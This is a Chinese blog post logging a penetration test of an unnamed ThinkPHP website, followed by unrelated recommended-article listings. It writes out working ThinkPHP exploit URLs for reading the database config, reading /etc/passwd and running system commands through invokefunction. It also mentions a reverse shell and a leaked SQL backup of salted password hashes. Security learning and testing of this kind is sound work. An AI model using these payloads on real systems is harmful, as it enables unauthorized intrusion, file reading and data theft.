记录日常测试(二)

最新推荐文章于 2024-08-11 18:16:25 发布
最新推荐文章于 2024-08-11 18:16:25 发布
阅读量332 收藏 10
点赞数 4
分类专栏: 测试文章 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60767986/article/details/139692549
版权

记录日常测试(二)

请勿使用本文档提供的相关工具开展任何违法犯罪活动。本技术类文档与工具仅支持学习安全技术使用,他用造成严重后果,请自行负责!!!

测试接踵而至,根本停不下来

信息收集

打开这样一个网站,点一点,发现有这种传参,那必然要试一试sql注入

image-20240614235000729

加了一个单引号,thinkphp特征出来了

image-20240614235158313

之后,先是尝试了sql注入,发现没有漏洞

发现漏洞

好吧,我们直接进行漏洞测试,历史漏洞扫描一波

好家伙,盆满钵满

image-20240615010135942

一个一个试一试,发现数据库账号root,密码是空

/?s=index/think\config/get&name=database.username

image-20240615000527386

存在任意文件读取

/?s=index/\think\Lang/load&file=/etc/passwd

image-20240615000651862

命令执行试一试

/?s=index/\think\app/invokefunction&function=system&vars[0]=whoami&vars[1][]=-1

image-20240615001056580

后渗透

反弹shell,之后想写个webshell,结果发现www权限,不能写文件,醉了

image-20240615002945326

好吧权限没法提升,还是太菜

再转转

看了看84端口,是一个登录口,试了试弱口令啥的,都没有

image-20240615005307988

看了一下81端口

image-20240615005127948

好家伙,又是泄露,而且点一点,看一看,看到了sql备份

image-20240615005434153

各种数据,但是数据库里密码都是加盐的MD5加密,难搞

image-20240615005612547

本白的三养胶麦
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
章:软件测试的方法
m0_69230313的博客
04-08 2684
测试用例 测试用例:将要进行的测试工作具体化,并且记录到一个文件中,一般情况下是一个excel表格。 在测试用例中,明确指定了每一步的具体操作,并且期望得到的结果。 测试工作:等程序员完成代码,此时可以先进行前期的准备工作,就是编写测试用例,将需要测试的每一项都填写在表格里。当程序员完成代码后,就可以开始进行测试,就是按照表格里的内容一步步的进行测试操作。 测试用例的基本构成:【8要素】 ...
一名测试工程师的日常习惯
weixin_39757068的博客
08-08 1761
工作日常积累 学会使用共享笔记类应用(如Gitbook、印象笔记、有道云笔记),实时记录日常工作中的重要信息和对自己有帮助的内容。 Meeting 组织者:请提前15分钟准备会议环境和通知参与者,如时间有变动,及时通知其他会议参与者。 参与者:切记不要迟到,手机提前静音或关机,会议期间,集中注意力,做好笔记,积极发言。 工作思路 做到3W+1H原则: 1.Why:我为什么要去做? ...
测试日常讨论
热门推荐
weixin_45812996的博客
03-18 3万+
简介:作为测试人员,日常经常就测试过程和测试经验进行讨论,以下是我和朋友日常聊天时的技术讨论记录,希望能对测试人员更好的理解测试和对日常测试工作有所帮助。
软件测试日常工作是什么
qinge_Crazy的博客
10-15 1270
  最近几年,越来越多的人想要转行学习软件测试技术,对于软件测试这个岗位比较感兴趣,那么一般软件测试日常工作是什么呢?我们来看看下面的详细介绍。   软件测试培训分享:软件测试日常工作是什么?   1、根据测试用例执行测试用例,对照实际结果与预期结果,发现软件产品的问题,并在bug系统记录问题,开发根据你的描述能解决你发现的问题。这是一个软件测工程最基本的工作,会这些工作叫做初级软件测试工程师。(一级)   2、对测试软件产品有一点的了解,能对软件需求进行分析,设计软件测试用例,能对发现的bu
工作记录——渗透测试
qq_43638123的博客
06-13 2611
实习已经一个月了,对接触的一些渗透测试项目做一下记录,同时也是希望看到的大佬们对我的不足提出意见。 项目一:公安局项目 外网 B/S架构 web端渗透 这是awvs的扫描截图 漏洞名称 数据明文传输 风险等级 中风险 渗透过程 在登录时进行抓包,发现用户名和密码以明文的形式进行传输。如下图所示: 漏洞危害 明文传输一般存在于web网站登录页面,密码明文传输容易被嗅探软件截取破解。 修复建议 建议按照网站的加密等级要求,需要对密码传输过程中进行加密传输。如采取MD5加验或SM1、S
测试工程师日常工作流程
qq_36601420的博客
05-16 2586
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 、使用步骤 1.引入库 2.读入数据 总结 前言 测试,特别是软件测试在目前软件研发流程里基本是最后一环。大部分测试都逃不过被产品一直改需求,开发一直拖时间的命运。所以在上线时间一直不会变的情况下,测试工程师何时介入,何时收尾,对我们测试工程师来说如何在这种场景下做到保质保量是非常重要的。本文将介绍测试工程师在日常的项目过程中基本的工作流程 一、需求分...
一名软件测试工程师的日常
程序员小谭的博客
12-26 2310
大家好,我是测试奇谭的作者风风。 最近,团队里一位优秀的测试小伙伴进行了转正答辩,风风觉得他的转正答辩报告体现了一名测试工程师的日常工作和思考。 这不恰好到了年终,各种年度个人总结还有30秒到达战场。因此,我将这份转正报告笔述出来,大家在写年终总结时可以做个参考。 工作内容报告 01 跟踪产品流程 评审需求文档,跟进需求迭代,评审研发设计方案,追求写出完美的测试用例 02 快、近、早地介入测试 早参与,早评审,早写用例,并在测试过程中精准定位bug 03 提高效率 用提效方法,找提效工具,
测试用例(功能用例)——完整demo(一千多条测试用例)
红目香薰
05-29 3万+
资产管理用例表 模块名称 用例个数(个) 用例链接 登录 20 测试用例(功能用例)——登录、首页、个人信息_红目香薰的博客-CSDN博客 首页 4 个人信息 44 资产类别 49 测试用例(功能用例)——资产类别、品牌、取得方式_红目香薰的博客-CSDN博客 品牌 49 取得方式 49 供应商 80 测试用例(功能用例)——供应商、存放地点、部门管理_红目香薰的博客-CSDN博客 存放地点
软件测试报告模板(完整版)
感谢关注-最近在编写开源的自动化测试框架还没整理完
09-22 1万+
本文档为某某某软件项目测试报告,主要内容包测试时间、地点及人员、环境描述、总结评价(测试过程统计、系统质量评估)、遗留问题报告等。主要的读者有评估人员、开发人员、项目经理、用户代表等。
常见测试用例
m0_62476684的博客
02-27 2870
常见测试用例
java日常记录
06-21
【标题】:“java日常记录”指的是作者在学习或工作中对Java编程语言的日常学习与实践进行的记录。这种记录可能包括遇到的问题、解决方案、代码片段、技术分享等内容,旨在积累经验,提高技能。 【描述】:“java...
互联网日常开发测试报告
01-31
### 测试报告的重要性和组成要素 #### 2.1 测试报告的重要性 测试报告是对测试过程中发现的问题及其解决方案进行记录和分析的重要文档。它不仅能够帮助项目团队了解当前软件的质量状况,还为后续的版本迭代...
部分-SDH日常维护操作指导和记录表格.doc
04-10
- **日常检查**:每日参照《SDH日常维护操作指导》进行设备检查和测试,并记录检查结果。 - **风扇清洁**:每两周清洁一次风扇防尘网,如果发现设备过热,应检查风扇是否堵塞。 - **安全措施**:设备风扇需保持...
linux测试,用于日常练习Linux的记录.rar
07-12
·实验条件 1.Ubuntu系统 三·实验内容 进入Ubuntu系统 基本命令练习 打开命令行,使用poweroff命令关机;(非必) 使用reboot命令重启;(非必) 3.目录操作命令练习 (1)创建目录 在当前目录下分别创建...
软件测试毕业实习报告记录.docx
11-05
10. **职业素养**:实习期间的日常测试工作不仅锻炼了我的专业技能,也教会了我良好的工作习惯,如按时完成任务,保持良好的沟通,以及在实习结束时妥善处理离职手续。 在葛洲坝集团电力有限责任公司实习的这段时间...
网络安全知识渗透测试
m0_66268916的博客
08-09 598
渗透测试是一种模拟网络攻击,用于识别漏洞并制定规避防御措施的策略。笔测试还有助于评估组织的合规性、提高员工对安全协议的认识、评估事件响应计划的有效性并确保业务连续性。渗透测试的第一步是收集有关目标网络的信息,了解网络拓扑、主机信息、服务信息、用户账户等,以便制定针对性的攻击策略。成功攻破目标系统后,需要进行后渗透测试,巩固攻击成果,并获取更多信息。根据信息收集和漏洞扫描的结果,选择合适的攻击方法,对目标网络进行渗透测试。完成渗透测试后,需要对测试结果进行分析,评估内网的整体安全状况。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 1048
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
网络安全(黑客)—自学手册
dexi113的博客
08-05 1646
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
网络安全流程规范文件解读(安全专业L1级)
最新发布
qyq88888的专栏
08-11 1006
网络运行重大故障定义涵盖了现网各类重要业务和设备:1.重大业务故障:话音业务、数据业务、互联互通业务2.重大设备故障:传输网、承载网(IP承载网及CMNET)、无线接入网、核心网、语音增值平台、数据网、网管网、电源、空调。3.TD网络重大故障。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值